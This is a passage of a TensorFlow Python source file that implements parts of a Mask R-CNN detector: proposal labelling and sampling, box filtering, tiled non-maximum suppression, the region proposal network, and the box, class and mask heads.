      last dimension is the pixel coordinates of scaled images in
      [ymin, xmin, ymax, xmax] form.
    gt_boxes: a tensor with a shape of [batch_size, MAX_NUM_INSTANCES, 4]. This
      tensor might have paddings with a value of -1. The coordinates of gt_boxes
      are in the pixel coordinates of the original image scale.
    gt_labels: a tensor with a shape of [batch_size, MAX_NUM_INSTANCES]. This
      tensor might have paddings with a value of -1.
    image_info: a tensor of shape [batch_size, 5] where the three columns
      encode the input image's [height, width, scale,
      original_height, original_width]. Height and width are for
      the input to the network, not the original image; scale is the scale
      factor used to scale the network input size to the original image size.
      See dataloader.DetectionInputProcessor for details. The last two are
      original height and width.
    batch_size_per_im: a integer represents RoI minibatch size per image.
    fg_fraction: a float represents the target fraction of RoI minibatch that
      is labeled foreground (i.e., class > 0).
    fg_thresh: a float represents the overlap threshold for an RoI to be
      considered foreground (if >= fg_thresh).
    bg_thresh_hi: a float represents the overlap threshold for an RoI to be
      considered background (class = 0 if overlap in [LO, HI)).
    bg_thresh_lo: a float represents the overlap threshold for an RoI to be
      considered background (class = 0 if overlap in [LO, HI)).
    is_training: a boolean that indicates the training mode, which performs
      subsampling; otherwise, no subsampling.

  Returns:
    box_targets: a tensor with a shape of [batch_size, K, 4]. The tensor
      contains the ground truth pixel coordinates of the scaled images for each
      roi. K is the number of sample RoIs (e.g., batch_size_per_im).
    class_targets: a integer tensor with a shape of [batch_size, K]. The tensor
      contains the ground truth class for each roi.
    rois: a tensor with a shape of [batch_size, K, 4], representing the
      coordinates of the selected RoI.
    proposal_to_label_map: a tensor with a shape of [batch_size, K]. This tensor
      keeps the mapping between proposal to labels. proposal_to_label_map[i]
      means the index of the ground truth instance for the i-th proposal.
  """
  with tf.name_scope('proposal_label'):
    batch_size = boxes.shape[0]
    # Scales ground truth boxes to the scaled image coordinates.
    image_scale = 1 / image_info[:, 2]
    scaled_gt_boxes = gt_boxes * tf.reshape(image_scale, [batch_size, 1, 1])
    # The reference implementation intentionally includes ground truth boxes in
    # the proposals. see https://github.com/facebookresearch/Detectron/blob/master/detectron/datasets/json_dataset.py#L359.  # pylint: disable=line-too-long
    if is_training:
      boxes = tf.concat([boxes, scaled_gt_boxes], axis=1)
    iou = _bbox_overlap(boxes, scaled_gt_boxes)
    (pre_sample_box_targets, pre_sample_class_targets, max_overlap,
     proposal_to_label_map) = _add_class_assignments(
         iou, scaled_gt_boxes, gt_labels)
    # Generates a random sample of RoIs comprising foreground and background
    # examples. reference: https://github.com/facebookresearch/Detectron/blob/master/detectron/roi_data/fast_rcnn.py#L132  # pylint: disable=line-too-long
    positives = tf.greater(max_overlap,
                           fg_thresh * tf.ones_like(max_overlap))
    # Background: overlap in [bg_thresh_lo, bg_thresh_hi).
    negatives = tf.logical_and(
        tf.greater_equal(max_overlap,
                         bg_thresh_lo * tf.ones_like(max_overlap)),
        tf.less(max_overlap,
                bg_thresh_hi * tf.ones_like(max_overlap)))
    # Background proposals get class 0 and no gt mapping.
    pre_sample_class_targets = tf.where(
        negatives, tf.zeros_like(pre_sample_class_targets),
        pre_sample_class_targets)
    proposal_to_label_map = tf.where(
        negatives, tf.zeros_like(proposal_to_label_map),
        proposal_to_label_map)
    # Returns box/class targets and rois before sampling for evaluation.
    if not is_training:
      return (pre_sample_box_targets, pre_sample_class_targets,
              boxes, proposal_to_label_map)
    # Handles ground truth paddings: padded gt boxes produce an IoU of -1
    # (see _bbox_overlap), so a negative row minimum marks affected RoIs.
    ignore_mask = tf.less(
        tf.reduce_min(iou, axis=2), tf.zeros_like(max_overlap))
    # indicator includes both positive and negative labels.
    # labels includes only positives labels.
    # positives = indicator & labels.
    # negatives = indicator & !labels.
    # ignore = !indicator.
    labels = positives
    pos_or_neg = tf.logical_or(positives, negatives)
    indicator = tf.logical_and(pos_or_neg, tf.logical_not(ignore_mask))
    all_samples = []
    sampler = (
        balanced_positive_negative_sampler.BalancedPositiveNegativeSampler(
            positive_fraction=fg_fraction, is_static=True))
    # Batch-unroll the sub-sampling process.
    for i in range(batch_size):
      samples = sampler.subsample(
          indicator[i], batch_size_per_im, labels[i])
      all_samples.append(samples)
    all_samples = tf.stack([all_samples], axis=0)[0]
    # A workaround to get the indices from the boolean tensors.
    _, samples_indices = tf.nn.top_k(tf.to_int32(all_samples),
                                     k=batch_size_per_im, sorted=True)
    # Constructs flat indices for gather by offsetting each batch row by its
    # row index times the number of boxes.
    samples_indices = tf.reshape(
        samples_indices + tf.expand_dims(
            tf.range(batch_size) * tf.shape(boxes)[1], 1), [-1])
    rois = tf.reshape(
        tf.gather(tf.reshape(boxes, [-1, 4]), samples_indices),
        [batch_size, -1, 4])
    class_targets = tf.reshape(
        tf.gather(
            tf.reshape(pre_sample_class_targets, [-1, 1]), samples_indices),
        [batch_size, -1])
    sample_box_targets = tf.reshape(
        tf.gather(tf.reshape(pre_sample_box_targets, [-1, 4]), samples_indices),
        [batch_size, -1, 4])
    sample_proposal_to_label_map = tf.reshape(
        tf.gather(tf.reshape(proposal_to_label_map, [-1, 1]), samples_indices),
        [batch_size, -1])
  return sample_box_targets, class_targets, rois, sample_proposal_to_label_map
def _top_k(scores, k, topk_sorted):
  """A wrapper that returns top-k scores and indices with batch dimension.

  Args:
    scores: a tensor with a shape of [batch_size, N]. N is the number of scores.
    k: an integer for selecting the top-k elements.
    topk_sorted: a boolean to sort the top-k elements.

  Returns:
    top_k_scores: the selected top-k scores with a shape of [batch_size, k].
    gather_indices: the indices to gather the elements. It has a shape of
      [batch_size, k].
  """
  with tf.name_scope('top_k_wrapper'):
    top_k_scores, top_k_indices = tf.nn.top_k(scores, k=k, sorted=topk_sorted)
    # Pair each selected index with its batch row so the result can be used
    # for [batch, index] style gathers.
    num_rows = scores.shape[0]
    row_ids = tf.tile(tf.expand_dims(tf.range(num_rows), axis=1), [1, k])
    gather_indices = tf.stack([row_ids, top_k_indices], axis=2)
    return top_k_scores, gather_indices
def _filter_boxes(scores, boxes, rpn_min_size, image_info):
  """Filters boxes whose height or width is smaller than rpn_min_size.

  Reference: https://github.com/facebookresearch/Detectron/blob/master/detectron/ops/generate_proposals.py  # pylint: disable=line-too-long

  Args:
    scores: a tensor with a shape of [batch_size, N].
    boxes: a tensor with a shape of [batch_size, N, 4]. The proposals
      are in pixel coordinates.
    rpn_min_size: a integer that represents the smallest length of the image
      height or width.
    image_info: a tensor of shape [batch_size, 5] where the three columns
      encode the input image's [height, width, scale,
      original_height, original_width]. `scale` is the scale
      factor used to scale the network input size to the original image size.
      See dataloader.DetectionInputProcessor for details.

  Returns:
    scores: a tensor with a shape of [batch_size, anchors]. Same shape and dtype
      as input scores.
    proposals: a tensor with a shape of [batch_size, anchors, 4]. Same shape and
      dtype as input boxes.
  """
  with tf.name_scope('filter_boxes'):
    y_min, x_min, y_max, x_max = tf.split(
        value=boxes, num_or_size_splits=4, axis=2)
    image_info = tf.cast(tf.expand_dims(image_info, axis=2), dtype=boxes.dtype)
    # Each of the following has a shape of [batch_size, 1, 1].
    image_height = image_info[:, 0:1, :]
    image_width = image_info[:, 1:2, :]
    image_scale = image_info[:, 2:3, :]
    min_size = tf.cast(tf.maximum(rpn_min_size, 1), dtype=boxes.dtype)
    # Box extents and centers, computed relative to the scaled input image.
    heights = y_max - y_min + 1
    widths = x_max - x_min + 1
    y_ctr = y_min + heights / 2
    x_ctr = x_min + widths / 2
    tall_enough = tf.greater_equal(heights, min_size * image_scale)
    wide_enough = tf.greater_equal(widths, min_size * image_scale)
    center_inside = tf.logical_and(
        tf.less(y_ctr, image_height), tf.less(x_ctr, image_width))
    keep = tf.logical_and(tf.logical_and(tall_enough, wide_enough),
                          center_inside)[:, :, 0]
    # Rejected boxes keep their slots but are zeroed out along with scores.
    scores = tf.where(keep, scores, tf.zeros_like(scores))
    boxes = tf.cast(tf.expand_dims(keep, 2), boxes.dtype) * boxes
    return scores, boxes
def _self_suppression(iou, _, iou_sum):
  # One iteration of iterative self-suppression within a single NMS tile.
  # `iou` holds only entries that exceeded the NMS threshold (zeroed
  # otherwise upstream); a suppressed box loses its ability to suppress
  # other boxes. The loop driving this body terminates once the total IoU
  # mass stops changing.
  batch_size = tf.shape(iou)[0]
  # A box can suppress others only if its own max incoming IoU is <= 0.5,
  # i.e. nothing currently suppresses it.
  can_suppress_others = tf.cast(
      tf.reshape(tf.reduce_max(iou, 1) <= 0.5, [batch_size, -1, 1]), iou.dtype)
  # Zero the IoU rows of boxes that a surviving box suppresses, so they no
  # longer contribute to suppression in the next iteration.
  iou_suppressed = tf.reshape(
      tf.cast(tf.reduce_max(can_suppress_others * iou, 1) <= 0.5, iou.dtype),
      [batch_size, -1, 1]) * iou
  iou_sum_new = tf.reduce_sum(iou_suppressed, [1, 2])
  # Second element is the while_loop continue condition: keep iterating
  # while the IoU mass changed meaningfully.
  return [
      iou_suppressed,
      tf.reduce_any(iou_sum - iou_sum_new > 0.5), iou_sum_new
  ]
def _cross_suppression(boxes, box_slice, iou_threshold, inner_idx):
  # Suppresses boxes in `box_slice` using the earlier (higher-scoring) tile
  # at `inner_idx`: any box whose IoU with some box of that tile reaches
  # `iou_threshold` is cleared to all zeros.
  batch_size = tf.shape(boxes)[0]
  new_slice = tf.slice(boxes, [0, inner_idx * _NMS_TILE_SIZE, 0],
                       [batch_size, _NMS_TILE_SIZE, 4])
  iou = _bbox_overlap(new_slice, box_slice)
  # Keep a box only if its IoU with every box in the suppressing tile stays
  # below the threshold.
  ret_slice = tf.expand_dims(
      tf.cast(tf.reduce_all(iou < iou_threshold, [1]), box_slice.dtype),
      2) * box_slice
  # Signature matches the tf.while_loop loop variables; only `box_slice`
  # and the induction variable change.
  return boxes, ret_slice, iou_threshold, inner_idx + 1
def _suppression_loop_body(boxes, iou_threshold, output_size, idx):
  """Process boxes in the range [idx*_NMS_TILE_SIZE, (idx+1)*_NMS_TILE_SIZE).

  Args:
    boxes: a tensor with a shape of [batch_size, anchors, 4].
    iou_threshold: a float representing the threshold for deciding whether boxes
      overlap too much with respect to IOU.
    output_size: an int32 tensor of size [batch_size]. Representing the number
      of selected boxes for each batch.
    idx: an integer scalar representing induction variable.

  Returns:
    boxes: updated boxes.
    iou_threshold: pass down iou_threshold to the next iteration.
    output_size: the updated output_size.
    idx: the updated induction variable.
  """
  num_tiles = tf.shape(boxes)[1] // _NMS_TILE_SIZE
  batch_size = tf.shape(boxes)[0]
  # Iterates over tiles that can possibly suppress the current tile: all
  # earlier tiles contain higher-scoring boxes (input is score-sorted).
  box_slice = tf.slice(boxes, [0, idx * _NMS_TILE_SIZE, 0],
                       [batch_size, _NMS_TILE_SIZE, 4])
  _, box_slice, _, _ = tf.while_loop(
      lambda _boxes, _box_slice, _threshold, inner_idx: inner_idx < idx,
      _cross_suppression, [boxes, box_slice, iou_threshold,
                           tf.constant(0)])
  # Iterates over the current tile to compute self-suppression.
  iou = _bbox_overlap(box_slice, box_slice)
  # Strict upper-triangular mask: within the tile a box may only be
  # suppressed by an earlier (higher-scoring) box, never by itself.
  mask = tf.expand_dims(
      tf.reshape(tf.range(_NMS_TILE_SIZE), [1, -1]) > tf.reshape(
          tf.range(_NMS_TILE_SIZE), [-1, 1]), 0)
  iou *= tf.cast(tf.logical_and(mask, iou >= iou_threshold), iou.dtype)
  # Run _self_suppression to a fixed point: suppressed boxes progressively
  # lose the ability to suppress others.
  suppressed_iou, _, _ = tf.while_loop(
      lambda _iou, loop_condition, _iou_sum: loop_condition, _self_suppression,
      [iou, tf.constant(True),
       tf.reduce_sum(iou, [1, 2])])
  # A box with any remaining incoming IoU mass is suppressed; zero it out.
  suppressed_box = tf.reduce_sum(suppressed_iou, 1) > 0
  box_slice *= tf.expand_dims(1.0 - tf.cast(suppressed_box, box_slice.dtype), 2)
  # Uses box_slice to update the input boxes: write the processed tile back
  # into position `idx`, leaving all other tiles untouched.
  mask = tf.reshape(
      tf.cast(tf.equal(tf.range(num_tiles), idx), boxes.dtype), [1, -1, 1, 1])
  boxes = tf.tile(tf.expand_dims(
      box_slice, [1]), [1, num_tiles, 1, 1]) * mask + tf.reshape(
          boxes, [batch_size, num_tiles, _NMS_TILE_SIZE, 4]) * (1 - mask)
  boxes = tf.reshape(boxes, [batch_size, -1, 4])
  # Updates output_size with the count of surviving (non-zero) boxes in this
  # tile.
  output_size += tf.reduce_sum(
      tf.cast(tf.reduce_any(box_slice > 0, [2]), tf.int32), [1])
  return boxes, iou_threshold, output_size, idx + 1
def _non_max_suppression_padded(
    scores, boxes, max_output_size, iou_threshold, level):
  """A wrapper that handles non-maximum suppression.

  Assumption:
    * The boxes are sorted by scores unless the box is a dot (all coordinates
      are zero).
    * Boxes with higher scores can be used to suppress boxes with lower scores.

  The overall design of the algorithm is to handle boxes tile-by-tile:

  boxes = boxes.pad_to_multiple_of(tile_size)
  num_tiles = len(boxes) // tile_size
  output_boxes = []
  for i in range(num_tiles):
    box_tile = boxes[i*tile_size : (i+1)*tile_size]
    for j in range(i - 1):
      suppressing_tile = boxes[j*tile_size : (j+1)*tile_size]
      iou = _bbox_overlap(box_tile, suppressing_tile)
      # if the box is suppressed in iou, clear it to a dot
      box_tile *= _update_boxes(iou)
    # Iteratively handle the diagonal tile.
    iou = _bbox_overlap(box_tile, box_tile)
    iou_changed = True
    while iou_changed:
      # boxes that are not suppressed by anything else
      suppressing_boxes = _get_suppressing_boxes(iou)
      # boxes that are suppressed by suppressing_boxes
      suppressed_boxes = _get_suppressed_boxes(iou, suppressing_boxes)
      # clear iou to 0 for boxes that are suppressed, as they cannot be used
      # to suppress other boxes any more
      new_iou = _clear_iou(iou, suppressed_boxes)
      iou_changed = (new_iou != iou)
      iou = new_iou
    # remaining boxes that can still suppress others, are selected boxes.
    output_boxes.append(_get_suppressing_boxes(iou))
    if len(output_boxes) >= max_output_size:
      break

  Args:
    scores: a tensor with a shape of [batch_size, anchors].
    boxes: a tensor with a shape of [batch_size, anchors, 4].
    max_output_size: a scalar integer `Tensor` representing the maximum number
      of boxes to be selected by non max suppression.
    iou_threshold: a float representing the threshold for deciding whether boxes
      overlap too much with respect to IOU.
    level: an integer for the level that the function operates on.

  Returns:
    nms_scores: a tensor with a shape of [batch_size, anchors]. It has same
      dtype as input scores.
    nms_proposals: a tensor with a shape of [batch_size, anchors, 4]. It has
      same dtype as input boxes.
  """
  with tf.name_scope('nms_l%d' % level):
    batch_size = tf.shape(boxes)[0]
    num_boxes = tf.shape(boxes)[1]
    # Pad the number of boxes up to a multiple of _NMS_TILE_SIZE so the
    # tiled suppression loop can take fixed-size slices.
    pad = tf.cast(
        tf.ceil(tf.cast(num_boxes, tf.float32) / _NMS_TILE_SIZE),
        tf.int32) * _NMS_TILE_SIZE - num_boxes
    boxes = tf.pad(tf.cast(boxes, tf.float32), [[0, 0], [0, pad], [0, 0]])
    scores = tf.pad(tf.cast(scores, tf.float32), [[0, 0], [0, pad]])
    num_boxes += pad

    def _loop_cond(unused_boxes, unused_threshold, output_size, idx):
      # Stop once every batch element has selected max_output_size boxes,
      # or when all tiles have been processed.
      return tf.logical_and(
          tf.reduce_min(output_size) < max_output_size,
          idx < num_boxes // _NMS_TILE_SIZE)

    # After the loop, suppressed boxes are all-zero rows in selected_boxes
    # and output_size holds the per-batch count of surviving boxes.
    selected_boxes, _, output_size, _ = tf.while_loop(
        _loop_cond, _suppression_loop_body, [
            boxes, iou_threshold,
            tf.zeros([batch_size], tf.int32),
            tf.constant(0)
        ])
    # Ranks positions in descending order (num_boxes..1), zeroes the ranks of
    # suppressed boxes, and uses top_k to recover the indices of the first
    # max_output_size surviving boxes per batch element.
    idx = num_boxes - tf.cast(
        tf.nn.top_k(
            tf.cast(tf.reduce_any(selected_boxes > 0, [2]), tf.int32) *
            tf.expand_dims(tf.range(num_boxes, 0, -1), 0), max_output_size)[0],
        tf.int32)
    idx = tf.minimum(idx, num_boxes - 1)
    # Flatten per-batch indices so a single gather can be used.
    idx = tf.reshape(
        idx + tf.reshape(tf.range(batch_size) * num_boxes, [-1, 1]), [-1])
    boxes = tf.reshape(
        tf.gather(tf.reshape(boxes, [-1, 4]), idx),
        [batch_size, max_output_size, 4])
    # Zero out slots beyond each batch element's actual output_size.
    boxes = boxes * tf.cast(
        tf.reshape(tf.range(max_output_size), [1, -1, 1]) < tf.reshape(
            output_size, [-1, 1, 1]), boxes.dtype)
    scores = tf.reshape(
        tf.gather(tf.reshape(scores, [-1, 1]), idx),
        [batch_size, max_output_size])
    scores = scores * tf.cast(
        tf.reshape(tf.range(max_output_size), [1, -1]) < tf.reshape(
            output_size, [-1, 1]), scores.dtype)
    return scores, boxes
def _proposal_op_per_level(scores, boxes, anchor_boxes, image_info,
                           rpn_pre_nms_topn, rpn_post_nms_topn,
                           rpn_nms_threshold, rpn_min_size, level):
  """Proposes RoIs for the second stage nets.

  This proposal op performs the following operations.
    1. for each location i in a (H, W) grid:
         generate A anchor boxes centered on cell i
         apply predicted bbox deltas to each of the A anchors at cell i
    2. clip predicted boxes to image
    3. remove predicted boxes with either height or width < threshold
    4. sort all (proposal, score) pairs by score from highest to lowest
    5. take the top rpn_pre_nms_topn proposals before NMS
    6. apply NMS with a loose threshold (0.7) to the remaining proposals
    7. take after_nms_topN proposals after NMS
    8. return the top proposals
  Reference: https://github.com/facebookresearch/Detectron/blob/master/detectron/ops/generate_proposals.py # pylint: disable=line-too-long

  Args:
    scores: a tensor with a shape of
      [batch_size, height, width, num_anchors].
    boxes: a tensor with a shape of
      [batch_size, height, width, num_anchors * 4], in the encoded form.
    anchor_boxes: an Anchors object that contains the anchors with a shape of
      [batch_size, height, width, num_anchors * 4].
    image_info: a tensor of shape [batch_size, 5] where the three columns
      encode the input image's [height, width, scale,
      original_height, original_width]. Height and width are for
      the input to the network, not the original image; scale is the scale
      factor used to scale the network input size to the original image size.
      See dataloader.DetectionInputProcessor for details. The last two are
      original height and width.
    rpn_pre_nms_topn: an integer number of top scoring RPN proposals to keep
      before applying NMS. This is *per FPN level* (not total).
    rpn_post_nms_topn: an integer number of top scoring RPN proposals to keep
      after applying NMS. This is the total number of RPN proposals produced.
    rpn_nms_threshold: a float number between 0 and 1 as the NMS threshold
      used on RPN proposals.
    rpn_min_size: an integer number as the minimum proposal height and width
      as both need to be greater than this number. Note that this number is
      at original image scale; not the scale used during training or
      inference.
    level: an integer number for the level that the function operates on.

  Returns:
    scores: a tensor with a shape of [batch_size, rpn_post_nms_topn, 1]
      representing the scores of the proposals. It has same dtype as input
      scores.
    boxes: a tensor with a shape of [batch_size, rpn_post_nms_topn, 4]
      representing the boxes of the proposals. The boxes are in normalized
      coordinates with a form of [ymin, xmin, ymax, xmax]. It has same dtype
      as input boxes.
  """
  with tf.name_scope('proposal-l%d' % level):
    # 4. sort all (proposal, score) pairs by score from highest to lowest
    # 5. take the top rpn_pre_nms_topn proposals before NMS
    batch_size, h, w, num_anchors = scores.get_shape().as_list()
    scores = tf.reshape(scores, [batch_size, -1])
    boxes = tf.reshape(boxes, [batch_size, -1, 4])
    # Map scores to [0, 1] for convenience of setting min score.
    scores = tf.sigmoid(scores)
    # Cannot keep more proposals than there are anchor locations.
    topk_limit = (h * w * num_anchors if h * w * num_anchors < rpn_pre_nms_topn
                  else rpn_pre_nms_topn)
    anchor_boxes = tf.reshape(anchor_boxes, [batch_size, -1, 4])
    scores, top_k_indices = tf.nn.top_k(scores, k=topk_limit)
    # Gather the boxes and anchors matching the top-k scores. The batch
    # offsets flatten the per-batch indices for a single tf.gather.
    boxes_indices = tf.reshape(
        top_k_indices + tf.expand_dims(
            tf.range(batch_size) * tf.shape(boxes)[1], 1), [-1])
    boxes = tf.reshape(
        tf.gather(tf.reshape(boxes, [-1, 4]), boxes_indices),
        [batch_size, -1, 4])
    anchor_indices = tf.reshape(
        top_k_indices + tf.expand_dims(
            tf.range(batch_size) * tf.shape(anchor_boxes)[1], 1), [-1])
    anchor_boxes = tf.reshape(
        tf.gather(tf.reshape(anchor_boxes, [-1, 4]), anchor_indices),
        [batch_size, -1, 4])
    # Transforms anchors into proposals via bbox transformations.
    boxes = anchors.batch_decode_box_outputs_op(anchor_boxes, boxes)
    # 2. clip proposals to image (may result in proposals with zero area
    # that will be removed in the next step)
    boxes = anchors.clip_boxes(boxes, image_info[:, :2])
    # 3. remove predicted boxes with either height or width < min_size
    scores, boxes = _filter_boxes(scores, boxes, rpn_min_size, image_info)
    # 6. apply loose nms (e.g. threshold = 0.7)
    # 7. take after_nms_topN (e.g. 300)
    # 8. return the top proposals (-> RoIs top)
    post_nms_topk_limit = (topk_limit if topk_limit < rpn_post_nms_topn else
                           rpn_post_nms_topn)
    # NMS is skipped entirely when the threshold is non-positive.
    if rpn_nms_threshold > 0:
      scores, boxes = _non_max_suppression_padded(
          scores, boxes, max_output_size=post_nms_topk_limit,
          iou_threshold=rpn_nms_threshold, level=level)
    scores, top_k_indices = _top_k(scores, k=post_nms_topk_limit,
                                   topk_sorted=True)
    boxes = tf.gather_nd(boxes, top_k_indices)
    return scores, boxes
def proposal_op(scores_outputs, box_outputs, all_anchors, image_info,
                rpn_pre_nms_topn, rpn_post_nms_topn, rpn_nms_threshold,
                rpn_min_size):
  """Proposes RoIs for the second stage nets.

  This proposal op performs the following operations.
    1. propose rois at each level.
    2. collect all proposals.
    3. keep rpn_post_nms_topn proposals by their sorted scores from the
       highest to the lowest.
  Reference: https://github.com/facebookresearch/Detectron/blob/master/detectron/ops/collect_and_distribute_fpn_rpn_proposals.py # pylint: disable=line-too-long

  Args:
    scores_outputs: an OrderedDict with keys representing levels and values
      representing logits in [batch_size, height, width, num_anchors].
    box_outputs: an OrderedDict with keys representing levels and values
      representing box regression targets in
      [batch_size, height, width, num_anchors * 4]
    all_anchors: an Anchors object that contains the all anchors.
    image_info: a tensor of shape [batch_size, 5] where the three columns
      encode the input image's [height, width, scale,
      original_height, original_width]. Height and width are for
      the input to the network, not the original image; scale is the scale
      factor used to scale the network input size to the original image size.
      See dataloader.DetectionInputProcessor for details. The last two are
      original height and width.
    rpn_pre_nms_topn: an integer number of top scoring RPN proposals to keep
      before applying NMS. This is *per FPN level* (not total).
    rpn_post_nms_topn: an integer number of top scoring RPN proposals to keep
      after applying NMS. This is the total number of RPN proposals produced.
    rpn_nms_threshold: a float number between 0 and 1 as the NMS threshold
      used on RPN proposals.
    rpn_min_size: an integer number as the minimum proposal height and width
      as both need to be greater than this number. Note that this number is
      at original image scale; not the scale used during training or
      inference.

  Returns:
    scores: a tensor with a shape of [batch_size, rpn_post_nms_topn, 1]
      representing the scores of the proposals.
    rois: a tensor with a shape of [batch_size, rpn_post_nms_topn, 4]
      representing the boxes of the proposals. The boxes are in normalized
      coordinates with a form of [ymin, xmin, ymax, xmax].
  """
  with tf.name_scope('proposal'):
    levels = scores_outputs.keys()
    scores = []
    rois = []
    anchor_boxes = all_anchors.get_unpacked_boxes()
    for level in levels:
      # Expands the batch dimension for anchors as anchors do not have batch
      # dimension. Note that batch_size is invariant across levels.
      batch_size = scores_outputs[level].shape[0]
      anchor_boxes_batch = tf.cast(
          tf.tile(tf.expand_dims(anchor_boxes[level], axis=0),
                  [batch_size, 1, 1, 1]),
          dtype=scores_outputs[level].dtype)
      scores_per_level, boxes_per_level = _proposal_op_per_level(
          scores_outputs[level], box_outputs[level], anchor_boxes_batch,
          image_info, rpn_pre_nms_topn, rpn_post_nms_topn, rpn_nms_threshold,
          rpn_min_size, level)
      scores.append(scores_per_level)
      rois.append(boxes_per_level)
    # Concatenate the per-level proposals along the box dimension.
    scores = tf.concat(scores, axis=1)
    rois = tf.concat(rois, axis=1)
    with tf.name_scope('post_nms_topk'):
      # Selects the top-k rois, k being rpn_post_nms_topn or the number of
      # total anchors after non-max suppression.
      post_nms_num_anchors = scores.shape[1]
      post_nms_topk_limit = (
          post_nms_num_anchors if post_nms_num_anchors < rpn_post_nms_topn
          else rpn_post_nms_topn)
      top_k_scores, top_k_indices = _top_k(scores, k=post_nms_topk_limit,
                                           topk_sorted=True)
      top_k_rois = tf.gather_nd(rois, top_k_indices)
    # Proposals are treated as fixed inputs to the second stage: no gradient
    # flows back into the RPN through the selected RoIs or their scores.
    top_k_scores = tf.stop_gradient(top_k_scores)
    top_k_rois = tf.stop_gradient(top_k_rois)
    return top_k_scores, top_k_rois
def rpn_net(features, min_level=2, max_level=6, num_anchors=3):
  """Region Proposal Network (RPN) for Mask-RCNN.

  Applies a shared 3x3 conv + ReLU trunk followed by two sibling 1x1 conv
  heads (objectness scores and box deltas) to every pyramid level. Variables
  are shared across levels through tf.AUTO_REUSE.

  Args:
    features: a dictionary mapping pyramid level to its feature tensor.
    min_level: lowest pyramid level to process (inclusive).
    max_level: highest pyramid level to process (inclusive).
    num_anchors: number of anchors per spatial location.

  Returns:
    A pair of dictionaries (scores_outputs, box_outputs) keyed by level.
  """
  with tf.variable_scope('rpn_net', reuse=tf.AUTO_REUSE):

    def _rpn_head(level_feats):
      """Shared trunk plus score/box branches for a single level."""
      # TODO(chiachenc): check the channel depth of the first convolution.
      trunk = tf.layers.conv2d(
          level_feats,
          256,
          kernel_size=(3, 3),
          strides=(1, 1),
          activation=tf.nn.relu,
          bias_initializer=tf.zeros_initializer(),
          kernel_initializer=tf.random_normal_initializer(stddev=0.01),
          padding='same',
          name='rpn')
      # Proposal classification scores.
      level_scores = tf.layers.conv2d(
          trunk,
          num_anchors,
          kernel_size=(1, 1),
          strides=(1, 1),
          bias_initializer=tf.zeros_initializer(),
          kernel_initializer=tf.random_normal_initializer(stddev=0.01),
          padding='valid',
          name='rpn-class')
      # Proposal bbox regression deltas.
      level_boxes = tf.layers.conv2d(
          trunk,
          4 * num_anchors,
          kernel_size=(1, 1),
          strides=(1, 1),
          bias_initializer=tf.zeros_initializer(),
          kernel_initializer=tf.random_normal_initializer(stddev=0.01),
          padding='valid',
          name='rpn-box')
      return level_scores, level_boxes

    scores_outputs = {}
    box_outputs = {}
    for level in range(min_level, max_level + 1):
      scores_outputs[level], box_outputs[level] = _rpn_head(features[level])
  return scores_outputs, box_outputs
def faster_rcnn_heads(features, boxes, num_classes=91, mlp_head_dim=1024):
  """Box and class branches for the Mask-RCNN model.

  Reference: https://github.com/facebookresearch/Detectron/blob/master/detectron/modeling/fast_rcnn_heads.py # pylint: disable=line-too-long

  Args:
    features: A dictionary with key as pyramid level and value as features.
      The features are in shape of [batch_size, height_l, width_l,
      num_filters].
    boxes: A 3-D Tensor of shape [batch_size, num_boxes, 4]. Each row
      represents a box with [y1, x1, y2, x2] in un-normalized coordinates.
    num_classes: an integer for the number of classes.
    mlp_head_dim: an integer that is the hidden dimension in the
      fully-connected layers.

  Returns:
    class_outputs: a tensor with a shape of
      [batch_size, num_rois, num_classes], representing the class predictions.
    box_outputs: a tensor with a shape of
      [batch_size, num_rois, num_classes * 4], representing the box
      predictions.
  """
  with tf.variable_scope('faster_rcnn_heads'):
    # Multi-level RoIAlign produces 7x7 crops from the feature pyramid.
    roi_features = multilevel_crop_and_resize(features, boxes, output_size=7)
    # Flatten the spatial and channel axes before the fully-connected trunk.
    batch_size, num_rois = roi_features.get_shape().as_list()[:2]
    flattened = tf.reshape(roi_features, [batch_size, num_rois, -1])
    fc = tf.layers.dense(flattened, units=mlp_head_dim,
                         activation=tf.nn.relu, name='fc6')
    fc = tf.layers.dense(fc, units=mlp_head_dim,
                         activation=tf.nn.relu, name='fc7')
    # Sibling output heads: classification logits ...
    class_outputs = tf.layers.dense(
        fc, num_classes,
        kernel_initializer=tf.random_normal_initializer(stddev=0.01),
        bias_initializer=tf.zeros_initializer(),
        name='class-predict')
    # ... and per-class box regression deltas.
    box_outputs = tf.layers.dense(
        fc, num_classes * 4,
        kernel_initializer=tf.random_normal_initializer(stddev=0.001),
        bias_initializer=tf.zeros_initializer(),
        name='box-predict')
    return class_outputs, box_outputs
def mask_rcnn_heads(features, fg_box_rois, num_classes=91, mrcnn_resolution=28):
  """Mask branch for the Mask-RCNN model.

  Reference: https://github.com/facebookresearch/Detectron/blob/master/detectron/modeling/mask_rcnn_heads.py # pylint: disable=line-too-long

  Args:
    features: A dictionary with key as pyramid level and value as features.
      The features are in shape of [batch_size, height_l, width_l,
      num_filters].
    fg_box_rois: A 3-D Tensor of shape [batch_size, num_masks, 4]. Each row
      represents a box with [y1, x1, y2, x2] in un-normalized coordinates.
    num_classes: an integer for the number of classes.
    mrcnn_resolution: an integer that is the resolution of masks.

  Returns:
    mask_outputs: a tensor with a shape of
      [batch_size, num_masks, mrcnn_resolution, mrcnn_resolution, num_classes],
      representing the mask predictions.

  Raises:
    ValueError: If fg_box_rois is not a rank-3 tensor or the last dimension of
      fg_box_rois is not 4.
  """
  def _get_stddev_equivalent_to_msra_fill(kernel_size, fan_out):
    """Returns the stddev of random normal initialization as MSRAFill."""
    # Reference: https://github.com/pytorch/pytorch/blob/master/caffe2/operators/filler_op.h#L445-L463 # pylint: disable=line-too-long
    # For example, kernel size is (3, 3) and fan out is 256, stddev is 0.029.
    # stddev = (2/(3*3*256))^0.5 = 0.029
    return (2 / (kernel_size[0] * kernel_size[1] * fan_out)) ** 0.5

  if fg_box_rois.shape.ndims != 3:
    raise ValueError('fg_box_rois must be of rank 3.')
  # The last dimension holds the 4 box coordinates; report that dimension in
  # the error (the old message incorrectly referenced shape[1]).
  if fg_box_rois.shape[2] != 4:
    raise ValueError(
        'fg_box_rois.shape[2] is {}, but must be 4.'.format(
            fg_box_rois.shape[2])
    )
  with tf.variable_scope('mask_rcnn_heads'):
    batch_size, num_masks, _ = fg_box_rois.get_shape().as_list()
    # Performs multi-level RoIAlign; 14x14 crops feed the conv trunk below.
    features = multilevel_crop_and_resize(features, fg_box_rois, output_size=14)
    net = tf.reshape(
        features,
        [batch_size * num_masks, 14, 14, -1])
